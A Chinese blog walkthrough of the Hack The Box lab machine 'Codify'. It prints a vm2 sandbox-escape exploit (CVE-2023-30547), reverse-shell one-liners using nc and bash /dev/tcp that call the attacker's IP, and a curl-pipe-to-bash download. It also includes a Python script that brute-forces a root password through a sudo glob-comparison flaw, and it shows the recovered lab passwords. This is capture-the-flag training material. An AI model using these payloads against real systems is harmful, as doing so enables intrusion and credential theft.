HTB-Codify

最新推荐文章于 2024-07-25 17:06:06 发布
最新推荐文章于 2024-07-25 17:06:06 发布
阅读量412 收藏 9
点赞数 9
分类专栏: # HTB 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58528311/article/details/134961638
版权

一、信息收集

访问ip自动跳转域名地址绑定hosts文件

nmap扫描,开启了80,3000,4444,5555端口

┌──(root㉿kali)-[~/shell]
└─# nmap -sS -sU -T4 -A -v 10.10.11.239
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-12 22:37 CST
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 22:37
Completed NSE at 22:37, 0.00s elapsed
Initiating NSE at 22:37
Completed NSE at 22:37, 0.00s elapsed
Initiating NSE at 22:37
Completed NSE at 22:37, 0.00s elapsed
Initiating Ping Scan at 22:37
Scanning 10.10.11.239 [4 ports]
Completed Ping Scan at 22:37, 0.42s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 22:37
Scanning codify.htb (10.10.11.239) [1000 ports]
Discovered open port 80/tcp on 10.10.11.239
Discovered open port 22/tcp on 10.10.11.239
Discovered open port 3000/tcp on 10.10.11.239
Discovered open port 5555/tcp on 10.10.11.239
Discovered open port 4444/tcp on 10.10.11.239

二、漏洞利用

访问80端口,是一个可以在沙盒中执行Node.js代码,而且使用vm2安全库在沙盒中执行javascript代码

利用CVE-2023-30547漏洞

const {VM} = require("vm2");
const vm = new VM();

const code = `
err = {};
const handler = {
    getPrototypeOf(target) {
        (function stack() {
            new Error().stack;
            stack();
        })();
    }
};
  
const proxiedErr = new Proxy(err, handler);
try {
    throw proxiedErr;
} catch ({constructor: c}) {
    c.constructor('return process')().mainModule.require('child_process').execSync('touch pwned');
}
`

console.log(vm.run(code));

1. 方法一

查看网站根目录,发现有个contact

里面有个数据库文件,利用python开启http服务

const {VM} = require("vm2");
const vm = new VM();

const code = `
err = {};
const handler = {
    getPrototypeOf(target) {
        (function stack() {
            new Error().stack;
            stack();
        })();
    }
};
  
const proxiedErr = new Proxy(err, handler);
try {
    throw proxiedErr;
} catch ({constructor: c}) {
    c.constructor('return process')().mainModule.require('child_process').execSync('python3 -m http.server 8911 -d  /var/www/contact');
}
`

console.log(vm.run(code));

下载db文件,查看数据库内容

这里有个hash值进行爆破,得到密码spongebob1

直接连接ssh

2. 方法二

使用CVE-2023-30547直接反弹shell,反弹shell也有两种

方法一:使用语句直接反

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh-i2>&1|nc10.10.14.154 1234>/tmp/f

方法二:在自己的kali上建立一个html文件写入反弹命令,利用python建立http协议,然后再利用CVE-2023-30547访问1.html文件

第一步创建文件
#! /bin/bash
bash -c 'bash -i >& /dev/tcp/10.10.14.154/4444 0>&1'
第二部访问文件
curl http://10.10.14.154:8000/1.html | bash'

三、权限提升

sudo -l发现了mysql-backup.sh文件,这个是一个数据库备份脚本

#!/bin/bash
DB_USER="root"
DB_PASS=$(/usr/bin/cat /root/.creds)
BACKUP_DIR="/var/backups/mysql"

read -s -p "Enter MySQL password for $DB_USER: " USER_PASS
/usr/bin/echo

if [[ $DB_PASS == $USER_PASS ]]; then
        /usr/bin/echo "Password confirmed!"
else
        /usr/bin/echo "Password confirmation failed!"
        exit 1
fi

/usr/bin/mkdir -p "$BACKUP_DIR"

databases=$(/usr/bin/mysql -u "$DB_USER" -h 0.0.0.0 -P 3306 -p"$DB_PASS" -e "SHOW DATABASES;" | /usr/bin/grep -Ev "(Database|information_schema|performance_schema)")

for db in $databases; do
    /usr/bin/echo "Backing up database: $db"
    /usr/bin/mysqldump --force -u "$DB_USER" -h 0.0.0.0 -P 3306 -p"$DB_PASS" "$db" | /usr/bin/gzip > "$BACKUP_DIR/$db.sql.gz"
done

/usr/bin/echo "All databases backed up successfully!"
/usr/bin/echo "Changing the permissions"
/usr/bin/chown root:sys-adm "$BACKUP_DIR"
/usr/bin/chmod 774 -R "$BACKUP_DIR"
/usr/bin/echo 'Done!'

if [[ $DB_PASS == $USER_PASS ]]; then

脚本使用简单的文本比较来验证用户输入的密码是否与硬编码的密码匹配。我们使用脚本直接爆破

import string
import subprocess

all = list(string.ascii_letters + string.digits)  # 创建包含所有字母和数字的字符列表
password = ""  # 初始化密码为空字符串
found = False  # 初始化 found 变量为 False,表示密码尚未找到

while not found:
    for character in all:
        # 构建要执行的命令
        command = f"echo '{password}{character}*' | sudo /opt/scripts/mysql-backup.sh"
        
        # 使用 subprocess.run 执行命令,并获取标准输出
        output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True).stdout

        # 如果输出包含 "Password confirmed!" 字符串,表示密码中的字符是正确的
        if "Password confirmed!" in output:
            password += character  # 将当前字符添加到密码中
            print(password)  # 打印当前破解出的密码
            break  # 跳出字符循环,继续下一个字符的尝试
    else:
        found = True  # 如果 for 循环正常结束,表示已找到密码的所有字符

# 循环结束后,输出找到的密码
print("Found Password:", password)

最终得到密码:kljh12k3jhaskjh12kjh3

 

Plkaciu
关注
  • 9
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
HTB-Solutions
03-09
【标题】"HTB-Solutions" 提供的内容可能与网络安全平台 Hack The Box(HTB)有关,这通常指的是用户在该平台上完成的各种挑战的解决方案集。Hack The Box 是一个在线平台,让网络安全爱好者和专业人士可以通过解决...
qos-htb-开源
05-03
qos-htb是您一直在等待的简单带宽管理解决方案,graphix制作了图表,您可以在一秒钟之内查看到底谁在消耗带宽!
htb codify root 脚本
mikumiku~
11-06 337
【代码】htb codify root 脚本。
HackTheBox-Machines--Codify
七天
11-21 436
Codify 测试过程。
【渗透测试】Codify - HackTheBox,Node.js沙盒
m0_74272345的博客
11-23 361
Web直接讲明了是Node.js的VM2沙盒,直接拿现成CVE打就OK了立足点有较多的办法,最直接和常用的是反弹shell。我在这里又学习了不太常用的ssh公钥免密登录使用hashid识别hash类型,用hashcat爆破joshua的hash,拿到user.txtshell脚本中比较时""缺失导致模式匹配,用模式匹配爆破出root密码。
HTB靶场-Codify
yc11223344的博客
01-05 984
通过node.js的沙箱逃逸漏洞进行gatshell在/var/www/contact下发现数据库文件,拿到用户名和密码ssh连接后取得普通用户的flag通过可执行文件进行提权,拿到root的密码。
Hack The Box-Codify
分享
03-12 602
Hack The Box-Codify。。。。别抢我的端口啊!!
HTB | Codify vm2@3.9.16 中的沙箱逃逸
q
01-08 476
上传linpeas进行信息收集有一个数据库文件/var/www/contact/tickets.db。在其他wp 找到的破解root密码用python编写的脚本,使用gpt加上了注释使我更容易理解。可以看见这个是一个备份mysql的脚本,用户是root,这里需要验证root密码。将codify添加到hosts,访问80端口发现是vm2沙盒版本为3.9.16。在/var/www/contact/tickets.db发现一个hash。使用hashcat进行进行破解,先查找使用什么模式进行破解。
Hack The Box-Codify(2),Flutter最新开源框架
m0_60607371的博客
04-07 409
把dns写入host文件内!这样我们就可以通过域名访问web主页了!
xml-HTB-开源
05-02
xml-HTB是用于自动生成bash脚本的工具,该工具可在Linux上设置HTB。 它使用xml配置文件。 它易于使用,具有许多功能:多种深度的类,可配置的叶子,u32和fw过滤器,可同时配置两个输入
my-htb-tools3
03-19
my-htb-tools3
HTB-writeups:此仓库包含HackTheBox的文章
05-01
【标题】"HTB-writeups:此仓库包含HackTheBox的文章" 这个标题表明这是一个与网络安全相关的资源库,特别是关于HackTheBox(HTB)的挑战和机器的解决过程记录。HackTheBox是一个在线平台,允许安全专家和爱好者通过...
网络安全相关竞赛比赛
黑战士的博客
07-18 1000
湖南省委网信办联合省教育厅、省广播电视局、省政务管理服务局、省通信管理局、长沙市人民政府等6家单位共同主办。教育部认可的大学生学科竞赛网站链接(2023版)关键字:比赛、CTF、赛事、技能挑战。浙江省大学生网络与信息安全竞赛。全国网络安全行业职业技能大赛。湖南省“网安湘军杯”
2024春秋杯网络安全联赛夏季赛Crypto(AK)解题思路及用到的软件
符啸九天的博客
07-22 1031
2024春秋杯网络安全联赛夏季赛Crypto解题思路以及用到的软件1.vm(虚拟机kali)和Ubuntu,正常配置即可B站有很多。2.Visual Studio Code(里面要配置python,crypto库和Sagemath数学软件系统Sagemath)。3.随波逐流工作室 (1o1o.xyz)ctf工具。2024春秋竞赛ezzzecc视频解题思路2024春秋竞赛happy2024视频解析2024春秋竞赛夏季赛Signature解题思路
“微软蓝屏”事件:网络安全与系统稳定性的深刻反思
tian362的专栏
07-23 536
面对软件更新流程中的风险管理和质量控制问题、预防类似大规模故障的需求以及跨领域连锁反应的行业影响,我们需要从多个方面入手,加强风险识别与评估、完善测试流程、实施严格的质量控制措施、设计冗余系统、实施灾难恢复计划、建立高可用架构、利用自动化工具和监控系统以及加强跨行业合作等。通过部署多个相互独立的系统组件,可以在某个组件发生故障时,由其他组件接管其工作,从而确保系统整体的连续性和稳定性。在“微软蓝屏”事件中,微软的视窗系统作为众多行业信息系统的基石,其故障迅速波及到了多个领域,造成了广泛的影响。
标题:微软蓝屏事件:网络安全的警钟与反思
chezabo6116的博客
07-23 586
标题:微软蓝屏事件:网络安全的警钟与反思 近日,微软视窗系统软件更新引发的“微软蓝屏”事件,不仅在全球范围内引发了广泛关注,也对全球IT基础设施的韧性与安全性提出了严峻挑战。这次事件暴露了网络安全和系统稳定性方面的诸多问题。本文将从软件更新流程中的风险管理、预防大规模故障的最佳方案、以及跨领域连锁反应的行业影响三个方面,探讨如何构建更加稳固和安全的网络环境。 方向一:软件更新流程中的风险管理和质量控制机制 软件更新是系统维护的重要环节,但不当的更新流程可能会引入新的风险。此次“微软蓝屏”事件就是一个典型案例
新能源汽车的充电网络安全威胁和防护措施
博大汽车信息安全
07-24 630
该标准细化了系统安全防护目标及架构,在安全分区、网络专用、横向隔离、纵向认证、运营平台、充电设施等方面提出了具体技术建议,确定了电动汽车充电设施及运营平台的网络信息安全防护要求,适用于与电动汽车充电设施及运营平台、充电设备、移动智能终端充电软件的信息安全防护设计、信息安全评估等。用户隐私风险:用户在使用充电设施时通常需要提供个人信息、车辆信息、财务(支付)信息等,这些信息若受到黑客攻击或发生泄露,可能会给用户带来损失。:将充电桩安装在安全可靠的位置,使用坚固的外壳材料,具备防水、防尘、防雷击等功能。
医疗器械上市欧美,需要什么样的网络安全相关申报文件?
最新发布
网 安 云
07-25 456
医疗器械在欧美上市时,需要提交的网络安全相关申报文件主要包括网络安全管理计划、设计开发与维护流程、软件物料清单(SBOM)、网络安全风险评估报告、技术文档以及上市后监测计划等。内容:根据FDA的《医疗器械的网络安全指南:质量体系需考虑的因素和上市前需提交的材料》,制造商还需要提交其他与网络安全相关的文件,如网络安全风险评估报告、漏洞修复计划等。内容:制造商需要提交一份网络安全管理计划,该计划应包含在合理的时间内监控、识别并酌情解决上市后的网络安全漏洞和利用的策略,包括协调一致的漏洞披露和相关程序。
format htb
08-24
HTB is an abbreviation for Hack The Box, which is an online platform that provides hands-on penetration testing and hacking challenges. It allows users to simulate real-world cybersecurity scenarios and practice their skills in a safe and controlled environment. The format of HTB typically involves a series of machines or challenges that users need to exploit to gain root access or find flags. Participants can use various tools and techniques to solve the challenges and improve their knowledge of cybersecurity.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值